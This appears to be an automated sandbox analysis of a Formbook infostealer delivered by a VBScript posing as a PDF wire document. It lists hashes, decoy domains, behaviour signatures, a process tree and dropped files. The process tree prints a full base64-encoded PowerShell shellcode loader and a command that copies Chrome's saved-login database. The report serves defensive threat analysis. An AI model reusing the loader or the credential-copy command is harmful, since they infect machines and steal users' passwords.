Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    21-01-2022 14:24

General

  • Target

    Wire-84844663637346665.PDF.vbs

  • Size

    75KB

  • MD5

    2eb1625e8d4e3f9b19ab947d188d0be8

  • SHA1

    7aad4e8d8f521d1c36a7468418047c8a5751b7e9

  • SHA256

    354529cf4cd5498c64a0c69c6dd9eb8962250542eea7f89a76faf64f5086da35

  • SHA512

    7e2f8553d3375d1cfe0132a3abe854a1457f08c1f3c6bfbe730c044fec1a127f3a9405c59b1f620f91ea76b7eb7d68fce78058b68f4a69437d2e08b0879ad517

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

ty13

Decoy

renatocarrion.com

inadmaa.email

dgsgamer.com

scentsofhome.com

vimeghbrandshop.online

seaxneat.com

10448se147thave.com

msewy.xyz

greekgolden.com

thinktosolve.com

darmadao.com

patriotproperties.info

erwsed.tech

iamanocelot.com

marketinginspiration4.biz

googleprog.com

nz34.com

xu6cotckdwbd.xyz

jimmychenchen.com

kntfashionstore.online

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • Formbook Payload 3 IoCs
  • Adds policy Run key to start application 2 TTPs 1 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2760
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Wire-84844663637346665.PDF.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3264
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAGEAYwBvAG4AZwAgAFMAbABlAHQAbgAgAEYARQBKAEwAUABMAEEAIABWAGkAbgBkAGYAbAA0ACAAZgBhAHIAYQAgAGEAcgB0AGUAcgAgAE8AdgBlAHIAYQByAG8AIABDAEkATgBFAE4ARQBHACAARABkAHMAbwBmAHIAZQByADEAIABCAFIASQBUAFQATABFAFAAQQAgAFMAZQBtAGkAYwBvAHIAbwBuACAAQgB1AG4AZABkAHkAcgBlADEAIABVAE4ATQBBAE4AQQBHACAAUgBJAEMATwBDAEgARQBUACAAaABlAG4AcgBlAGcAbgAgAEkAbgBkAGQAZQBsAGkAbgBnAGUAMQAgAFIATwBUAEEAVABJACAATwB2AGUAcgBmAG8AZAByAGUAcwAxACAAUQBVAEkARQBUACAAYQByAGEAYgBhAG4AIABJAE4ARABEACAAdQBiAGUAdABpAG0AZQAgAGEAawB0AGkAdgBpAHMAdAAgAHAAZQByAHQAdQByAGIAZgAgAEoAQQBHAEUAUgBFAE4AIABLAEkATABPAE0ARQBHAEEAIABBAGMAaABvAG4AZAByACAAQgBuAG4AZQAgAEMAbwBuAGcAcgBlAGcAMwAgAEIAUgBBAE4ARABFAE4AIABJAG4AZwBlAG4AaQByAHQAMgAgAFIAZQB2AG8AIABTAGMAaQByACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABIAGEAbgBkAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEgAYQBuAGQAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBNAEEATABJAEcALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAsAHIAZQBmACAASQBuAHQAMwAyACAASABhAG4AZABsACwAaQBuAHQAIABCAG8AcgBkAHMAawA2ACwAaQBuAHQAIABIAGEAbgBkAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABEAEEAVQBHAEgAVABFAFIALAB1AGkAbgB0ACAAVABhAG4AegBhAG4AaQA1ACwAaQBuAHQAIABoAGEAYQBuACwAaQBuAHQAIABIAGEAbgBkAGwAMAAsAGkAbgB0ACAARgBhAGwAbABhAGMAaQBlAHMANQAsAGkAbgB0ACAAQgBHAEUAUgAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAwACwAdQBpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAxACwASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAAbQBlAHQAYQB0AGUAZwBuADMALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4ANQAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADYALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA3ACwAaQBuAHQAIABtAGUAdABhAHQAZQBnAG4AOAAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAVgBlAGoAcgBmAG8AOQAgAGMAbABvAGMAawByAGEAIABMAEkATQBCACAATwB2AGUAcgBtADYAIABIAHkAcABlAHIAIABEAGkAcwBkAGEAaQBuACAAbgBvAG4AYwBvAG4AIAB0AG8AbABkAGEAdAB0AGUAcwAgAFMAdQBsAGMAYQAgAE8AcAByAGUAdABoAG8AbAAgAGgAbwBsAG8AYwBoAG8AcgBkAGEAIABLAG8AbgB0AHIAbwBsAGsAbwBtACAARgBpAGwAdABlAHIAIABCAGUAcgBnAG0AYQBuAG4AcwAgAEMATwBFAE4AVQBSAEkAIABEAEEARwBOACAAVQBEAFIASwBTAFMAVABSAEEAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGIAbABhAGEAbAB5AHMAZQBuAGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIASwB1AGcAbABlAHAAZQAxACIAIAANAAoAJABIAGEAbgBkAGwAMwA9ADAAOwANAAoAJABIAGEAbgBkAGwAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABIAGEAbgBkAGwAOAA9AFsASABhAG4AZABsADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQASABhAG4AZABsADMALAAwACwAWwByAGUAZgBdACQASABhAG4AZABsADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBEAEUARgBJACAATgBvAG4AdAAyACAAbgBvAG4AYwBvAG4AcwB0ACAAbwB2AGUAcgB0AGUAbgBhAGMAIABpAGcAZAByAGEAcwBpAGwAbQBhACAAbABhAGEAbgB0AGEAZwBlAHIAZQAgAEEATQBQAEgATwBEAEEAIABHAEEATABFAEgAVQBTAFMASABBACAAUAByAGkAbQBvAHIAZABpAGEAaQAgAEEAdQB0AGUAbgB0ADUAIABWAGkAcwBjADcAIABDAG8AbAB1AG0AbgBpAHMAdABzACAAZgBvAHIAYgB5AHQAIABzAHAAcgByACAAUAB5AHIAZQB4AGkAYQAgAGIAbABhAHQAdABpAGYAIABrAHkAbABsAGkAbgBnAGUAaAAgAEwASQBWAEYAVQBMAEQAVABWACAAcwBoAGEAdAB0AGUAcgBpACAATQBBAEEATABTAFQATgBJAE4AIABTAGUAbQBpAHIAYQBkADUAIABGAG8AcgBzADUAIABJAE0ATQBJAFQASQBHAEEAQgBJACAASwBBAFAAQQBDACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAEUATQBIAFUATgAiACAADQAKACQASABhAG4AZABsADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAG0AeQBzAHQAZQAuAGQAYQB0ACIADQAKACMAUwB2AGkAbgBrAGUAcgBlAG4AZAAgAGQAdQBjAGgAZQBzACAAQgBqAGUAcgBnAG0AIABzAG8AYwBpAGEAbABkAGUAbQAgAEIAZQBsAG8AcwB0AG8AbQAgAEMAbwBoAG8AYgA1ACAAQQBSAEkAVABIAE0AIABQAG8AbAB5AGcAeQBuAGkAcwA3ACAAdAByAGEAbgBzAG0AaQBzAHMAaQAgAA0ACgAkAEgAYQBuAGQAbAA0AD0AWwBIAGEAbgBkAGwAMQBdADoAOgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAKAAkAEgAYQBuAGQAbAAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAZQByAGkAdgBlAHIAZQBuAGQAIABoAGUAYQB1AG0AZQBzAHIAYQB2ACAAYgB2AGUAcwB1ACAARgBBAEwARABFACAAUwBFAFIAVgBJAEMARQBLACAAVABSAEkARwBFACAARwBsAGEAbQBtAGUAbgAgAG0AZQBsAGkAbwBsAGEAdABpAGwAIABBAEsASwBPACAAQgBVAFAASAAgAFQAYQB4AGEAawByAHMAbABlACAARABpAHMAYwBvAHUAcgAxACAAVABhAGsAawBlAGsAOQAgAFQAUgBFAEUATABJAE4AIABCAEEARABMACAAZABlAGIAYQByAGsAZQAgAGsAZQBuAHQAbAAgAFMAcABhAG4AZABlACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgB0AGkAbAByAGEAYQAiACAADQAKACQASABhAG4AZABsADUAPQAwADsADQAKACMAQQBuAGEAbAB5AHMAZQB2AHIAIABKAEUAUgBTAEUAWQBLACAAdQBkAGIAZQBkAHIAZQBjACAAYgBpAHIAawBlACAAdgBhAG4AZAB0AHQAdQBrAHIAIABKAGUAbgBvAHAAOAAgAFAAZQByAGkAbgAxACAAdgBhAGEAYgBlAG4AYgByAHUAZwAgAEwAaQBjAGUAcABpADYAIABQAGEAdAByADQAIABoAHkAcABuAG8AdABpACAAQQBpAGwAcwB5AHQANAAgAFUAbgBuAGEAdQBzAGUAYQA0ACAARABlAHMAcABlADgAIABTAEkATgBVAE8AVQAgAEsAbwBuAGMAZQBuAHQAcgBhAHQANQAgAEcARQBOAEQAUgBJAFYAIABCAE8AUgBUAEYAIABBAG4AYQBiAG8AbgBnAHYANAAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAcwBpAG4AZwBsAGUAcABsAGEAIgAgAA0ACgBbAEgAYQBuAGQAbAAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQASABhAG4AZABsADQALAAkAEgAYQBuAGQAbAAzACwAMgA2ADAAMgA2ACwAWwByAGUAZgBdACQASABhAG4AZABsADUALAAwACkADQAKACMAZAByAGEAbgBrAGUAcgBlAHMAZwAgAEQAaQBwAGgANQAgAHMAdQB0AHMAawBvAGUAbgAgAFIATwBQAEUAVABSAEkAQwBLACAAUwB0AGoAZQByAG4AZQBzADYAIABSAGEAbABsADgAIABGAGkAZgBmACAARAB1AG4AZAAgAG0AYgBlAGwAZgBhAGIAcgBpACAASABhAHUAbQBwAG8AdABhAG0AIABhAG0AbQBvACAAVQBNAEIARQBMAEwAVQBMAEEAIABTAHAAYQBsAGkAcgBjAGgAcgBpACAAVABoAHIAZQBlAGYAYQA1ACAARwBvAGEAZABzAHQAZQByAGIANAAgAEkAbgBlAHgAcAB1AG4AZwBlADgAIABDAGEAcgBuAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAQQBOAEkATwBVAFMAUgBBACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEQAZQBhAHMAYQBmAHIAdQA1ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEQARQBNAEkATABJAEMASABSAEUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIASwBJAEwATwBUAE8ATgBOAEUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIASwBJAFIASwBFACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAZgBmAG8AdAAzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFIAZQBkAGkAdgBpAHMAaQBvACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHUAawByAGkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIASwBWAEEAUgBUAFMAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAaQBuAHQAdwBpAG4AZQBkAHUAbgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8ATQBBAEQASQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBWAGkAYwBlAGcAcgBlAHYAZQByACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHEAYQBmAHQAbwBwAGwAaQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBVAG4AcgBlAGEAbABuAGUAOQAiACAADQAKAFsASABhAG4AZABsADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAEgAYQBuAGQAbAAzACwAIAAwACwAMAAsADAALAAwACkADQAKAA0ACgA="
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2452
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cigu2pxb\cigu2pxb.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:868
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB264.tmp" "c:\Users\Admin\AppData\Local\Temp\cigu2pxb\CSCE150491F690E481894F092E6B463AE58.TMP"
            5⤵
              PID:1992
          • C:\Program Files (x86)\internet explorer\ieinstal.exe
            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
            4⤵
            • Checks QEMU agent file
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:2940
      • C:\Windows\SysWOW64\wscript.exe
        "C:\Windows\SysWOW64\wscript.exe"
        2⤵
        • Adds policy Run key to start application
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\SysWOW64\cmd.exe
          /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
          3⤵
            PID:2408
          • C:\Program Files\Mozilla Firefox\Firefox.exe
            "C:\Program Files\Mozilla Firefox\Firefox.exe"
            3⤵
              PID:3088

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Registry Run Keys / Startup Folder

        2
        T1060

        Defense Evasion

        Modify Registry

        3
        T1112

        Credential Access

        Credentials in Files

        1
        T1081

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Collection

        Data from Local System

        1
        T1005

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\DB1
          MD5

          b608d407fc15adea97c26936bc6f03f6

          SHA1

          953e7420801c76393902c0d6bb56148947e41571

          SHA256

          b281ce54125d4250a80f48fcc02a8eea53f2c35c3b726e2512c3d493da0013bf

          SHA512

          cc96ddf4bf90d6aaa9d86803cb2aa30cd8e9b295aee1bd5544b88aeab63dc60bb1d4641e846c9771bab51aabbfbcd984c6d3ee83b96f5b65d09c0841d464b9e4

        • C:\Users\Admin\AppData\Local\Temp\RESB264.tmp
          MD5

          69b13288c6a61f9b2b57e030c3ee2b22

          SHA1

          8d057ba2ff3d2b7b1b87febe6a4cf2c1bbb36d8a

          SHA256

          4b82557078c23c1be2c38e1082a94ffc64fa1e6fe91d3472bd56c2af7c919d14

          SHA512

          d37c571a9e6d11e1f07052825598a7f883e24487cbfeff9cbb1f22c75357b80e1015a0362a636dd6e9f7d8a5f27081f91b21703326d8c54d2d7fcb07e09417c2

        • C:\Users\Admin\AppData\Local\Temp\cigu2pxb\cigu2pxb.dll
          MD5

          6c385298f7ddc42b89620188c3727e12

          SHA1

          586afc7f3b43c275e550750a066e1781bd81ed4e

          SHA256

          c92cf4945a8739c7c4990303b019a7c8ec4db19ef07b675b346f206a636fa8b6

          SHA512

          916e0d01ce145b0a23bd9d7d5d13fda4309e9a5efbd0f891af7c1a6eee942bbab4e71cece4e6501a884572d6bdea7bdf26308a1c04f0a43eefed9a828295c43d

        • C:\Users\Admin\AppData\Local\Temp\myste.dat
          MD5

          b7a51df9fa975379cd0c8ebb06e4c9aa

          SHA1

          fd88dbf8ad8d28befa9ea1da48cfaff719867321

          SHA256

          4e24caf3042584cce2d363784f2f5353b57a86b3a482d8924ae25daba212502c

          SHA512

          0ae3237b03cddd4a8b992f563ec22f7e00847488744ccefaf52554162b1c8bb691a4ad68de7868ef05b09d57a570ef1d33940a5b8ccd6b0680979208f13e5d94

        • C:\Users\Admin\AppData\Roaming\O9P-4O7E\O9Plogim.jpeg
          MD5

          8d8f25de5ba0c8a5f677b4cd78839997

          SHA1

          8155de07f0bd9626ea15869a27200509a6180e48

          SHA256

          f2159aaf9d31ea581c01bcf8387d50a155c2e8ff3ee3cd8b228265ce77c95022

          SHA512

          bce52570e3b80ec8fc919a93af9b7ed215e9dccfc5a3d08e722a7057d8cc5c4dae7d827aa8c1e7c3a8fdfaf97b9f1984343b58bff8f3168b22ffcd3c00704547

        • C:\Users\Admin\AppData\Roaming\O9P-4O7E\O9Plogrf.ini
          MD5

          2f245469795b865bdd1b956c23d7893d

          SHA1

          6ad80b974d3808f5a20ea1e766c7d2f88b9e5895

          SHA256

          1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361

          SHA512

          909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f

        • C:\Users\Admin\AppData\Roaming\O9P-4O7E\O9Plogrg.ini
          MD5

          4aadf49fed30e4c9b3fe4a3dd6445ebe

          SHA1

          1e332822167c6f351b99615eada2c30a538ff037

          SHA256

          75034beb7bded9aeab5748f4592b9e1419256caec474065d43e531ec5cc21c56

          SHA512

          eb5b3908d5e7b43ba02165e092f05578f45f15a148b4c3769036aa542c23a0f7cd2bc2770cf4119a7e437de3f681d9e398511f69f66824c516d9b451bb95f945

        • C:\Users\Admin\AppData\Roaming\O9P-4O7E\O9Plogri.ini
          MD5

          d63a82e5d81e02e399090af26db0b9cb

          SHA1

          91d0014c8f54743bba141fd60c9d963f869d76c9

          SHA256

          eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae

          SHA512

          38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad

        • C:\Users\Admin\AppData\Roaming\O9P-4O7E\O9Plogrv.ini
          MD5

          bbc41c78bae6c71e63cb544a6a284d94

          SHA1

          33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a

          SHA256

          ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb

          SHA512

          0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4

        • \??\c:\Users\Admin\AppData\Local\Temp\cigu2pxb\CSCE150491F690E481894F092E6B463AE58.TMP
          MD5

          7597c4e7f08bd8c1025d9cc41ba4b770

          SHA1

          fc92e930d8009030da31c2cc00ca10c4764b705d

          SHA256

          a8cb2cee8931e3bd4787a3438fdf3a6ed036edc5ef567456ba048e10fbd45425

          SHA512

          bfe6be2d87f08967acc98969227423473edb2c87d416a22777bac84230a5ce1d559e434a744184371e9e66fb7433116dbccd19932535405ac3a884a4cdb532bc

        • \??\c:\Users\Admin\AppData\Local\Temp\cigu2pxb\cigu2pxb.0.cs
          MD5

          56063e7808df0479a9609de80e1b9f58

          SHA1

          e91b058ef18df8bf200d09718c2f94652320be9a

          SHA256

          a5410108ea6f6870414f8e11d765587b22d75d20f0806e0113c1e1ce0d01fe28

          SHA512

          dae399a0fce1282ad28984466b7724c1cafa0dc7fee7c3bbd6d15f9c519e811021eec579e83cf7af35556322999ed67ada8baa03b0cad09d5e0faa1bc52207b8

        • \??\c:\Users\Admin\AppData\Local\Temp\cigu2pxb\cigu2pxb.cmdline
          MD5

          b662d3c623908e0c8a091f09b0c8239f

          SHA1

          313dcefab622c1c8b9482ba9811afb0e1a7bddf3

          SHA256

          7831f763493e9bd1cedd1b84fa4915806f4cda45237e27c54709b3d965280e3a

          SHA512

          b5d0a9085ee56ef2359dd333958b76ad2b3d2fc96fcc4baaecc6fde0cc40e07bb9d8b5cd4d32c9655391f7ef4b73a90e9f2cd5d1e4a31dde0e1f09db3c15afa6

        • memory/1836-174-0x0000000004610000-0x00000000047AC000-memory.dmp
          Filesize

          1.6MB

        • memory/1836-172-0x0000000004950000-0x0000000004C70000-memory.dmp
          Filesize

          3.1MB

        • memory/1836-171-0x0000000000630000-0x000000000065F000-memory.dmp
          Filesize

          188KB

        • memory/1836-170-0x00000000011E0000-0x0000000001207000-memory.dmp
          Filesize

          156KB

        • memory/2452-152-0x0000000009B70000-0x000000000A1E8000-memory.dmp
          Filesize

          6.5MB

        • memory/2452-124-0x0000000008350000-0x00000000086A0000-memory.dmp
          Filesize

          3.3MB

        • memory/2452-141-0x00000000086E0000-0x00000000086E8000-memory.dmp
          Filesize

          32KB

        • memory/2452-146-0x0000000009CF0000-0x0000000009D84000-memory.dmp
          Filesize

          592KB

        • memory/2452-147-0x0000000009BD0000-0x0000000009BF2000-memory.dmp
          Filesize

          136KB

        • memory/2452-148-0x000000000AD70000-0x000000000B26E000-memory.dmp
          Filesize

          5.0MB

        • memory/2452-134-0x000000000A1F0000-0x000000000A868000-memory.dmp
          Filesize

          6.5MB

        • memory/2452-151-0x00000000052E3000-0x00000000052E4000-memory.dmp
          Filesize

          4KB

        • memory/2452-117-0x00000000052E0000-0x00000000052E1000-memory.dmp
          Filesize

          4KB

        • memory/2452-153-0x00007FF9C9E30000-0x00007FF9CA00B000-memory.dmp
          Filesize

          1.9MB

        • memory/2452-154-0x0000000077110000-0x000000007729E000-memory.dmp
          Filesize

          1.6MB

        • memory/2452-118-0x0000000007340000-0x0000000007376000-memory.dmp
          Filesize

          216KB

        • memory/2452-156-0x0000000077110000-0x000000007729E000-memory.dmp
          Filesize

          1.6MB

        • memory/2452-119-0x00000000079B0000-0x0000000007FD8000-memory.dmp
          Filesize

          6.2MB

        • memory/2452-120-0x00000000052E2000-0x00000000052E3000-memory.dmp
          Filesize

          4KB

        • memory/2452-121-0x0000000008010000-0x0000000008032000-memory.dmp
          Filesize

          136KB

        • memory/2452-122-0x00000000080B0000-0x0000000008116000-memory.dmp
          Filesize

          408KB

        • memory/2452-123-0x0000000008120000-0x0000000008186000-memory.dmp
          Filesize

          408KB

        • memory/2452-135-0x0000000009950000-0x000000000996A000-memory.dmp
          Filesize

          104KB

        • memory/2452-125-0x0000000008760000-0x000000000877C000-memory.dmp
          Filesize

          112KB

        • memory/2452-126-0x00000000088A0000-0x00000000088EB000-memory.dmp
          Filesize

          300KB

        • memory/2452-127-0x0000000008B40000-0x0000000008BB6000-memory.dmp
          Filesize

          472KB

        • memory/2760-169-0x00000000074C0000-0x000000000765A000-memory.dmp
          Filesize

          1.6MB

        • memory/2760-175-0x0000000006C20000-0x0000000006DA4000-memory.dmp
          Filesize

          1.5MB

        • memory/2940-168-0x000000001E800000-0x000000001E814000-memory.dmp
          Filesize

          80KB

        • memory/2940-167-0x000000001EDC0000-0x000000001F0E0000-memory.dmp
          Filesize

          3.1MB

        • memory/2940-166-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/2940-165-0x0000000000400000-0x00000000006A3000-memory.dmp
          Filesize

          2.6MB

        • memory/2940-164-0x0000000077110000-0x000000007729E000-memory.dmp
          Filesize

          1.6MB

        • memory/2940-163-0x0000000077110000-0x000000007729E000-memory.dmp
          Filesize

          1.6MB

        • memory/2940-162-0x00007FF9C9E30000-0x00007FF9CA00B000-memory.dmp
          Filesize

          1.9MB

        • memory/2940-159-0x0000000000AA0000-0x0000000000D60000-memory.dmp
          Filesize

          2.8MB

        • memory/2940-155-0x0000000000AA0000-0x0000000000BA0000-memory.dmp
          Filesize

          1024KB